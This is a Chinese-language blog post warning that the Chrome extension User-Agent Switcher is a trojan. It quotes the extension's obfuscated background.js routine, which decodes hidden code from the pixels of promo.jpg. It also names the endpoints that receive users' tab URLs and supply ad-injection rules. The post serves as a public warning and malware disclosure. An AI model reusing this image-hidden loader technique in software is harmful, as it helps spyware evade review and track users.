当前位置:首页 > 短网址资讯 > 正文内容

大家一定注意了 Chrome 的插件 User-Agent Switcher 是个木马!

www.ft12.com4年前 (2017-09-10)短网址资讯1688
hrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {            if ("" === '../promo.jpg') return "";            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];            if (c.data.every(function(t) {                    return 0 === t
                })) return "";
            var m, s;            if (1 === o)                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 


扫描二维码推送至手机访问。

版权声明:本文由短链接发布,如需转载请注明出处。

本文链接:https://www.ft12.com/article_469.html

分享给朋友:

相关文章

幸存者偏差:实现成功不是复制成功者,而是学习失败者

幸存者偏差:实现成功不是复制成功者,而是学习失败者

转眼2018年已即将接近尾声,新的2019即将到来。时间飞逝,是否今年还未来得及回忆?还是徘徊在自己的一事无成中?FT12短网址的小编今天分享一篇心灵鸡汤,预祝大家的即将到来的2019年能否有所成就。1英国著名魔术师和催眠师德伦·布朗在一个...

阿里如何实现高性能分布式强一致的独立 Paxos 基础库?

阿里如何实现高性能分布式强一致的独立 Paxos 基础库?

Paxos 从理论界到工业界,阿里怎样实现分布式系统的一致性? 1 写在前面 近来 Paxos 的分享和讨论越来越频繁,它是分布式系统保持一致性的法宝,但是同时又有着最难理解的算法之“美誉”。在阿里看来,虽然 Paxos 有一定社区热...

短网址使用技巧之高级篇:短网址访问统计分析模块

(1)时段计算剖析:时段概况计算、时段计算、日计算、月计算;(2)用户地域计算剖析;(3)用户来历计算剖析;(4)用户终端计算剖析:用户浏览器、操作体系、屏幕分辨率、言语环境;  短网址以此为数据支持,为以后拟定战略决策供给量化的依据。  ...

O2O进入下半场,百度或携人工智能实现弯道超车?

近日,百度外卖副总裁陈锦晖宣布辞职的消息刷爆了互联网,百度外卖业务要出售给顺丰的消息也时有流出。正如美团CEO王兴所言,国内O2O行业已经进入了“下半场”。随着移动互联网人口红利减退,烧钱竞争所带来的粗放式增长已经告一段落。 实际上在今年第...

飞牛网上线极速达业务 大润发正式布局全渠道

飞牛网上线极速达业务 大润发正式布局全渠道

2017年5月12日12点12分,飞牛网配送员小刘从大润发上海闸北店出发,历时12分钟,将12.00元的产品送至静安区江场三路12号。当客户汪先生承认收货时,飞牛急速达事务第一笔订单顺利完成。大润发飞牛网宣告,急速达正式上线,这也标志着大润...

短网址和二维码的应用:从零开始实现一套聚合支付系统

短网址和二维码的应用:从零开始实现一套聚合支付系统

短网址和二维码在移动扫码支付领域应用越来越广泛,FT12短网址的小编出门从来不带钱,现在从吃饭、交通、购物,甚至是取款机取款,都已经不需要钱和银行卡了。那么这么流行的二维码扫码支付,是如何实现的呢?其实聚合支付的原理很简单,长网址生成短网址...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。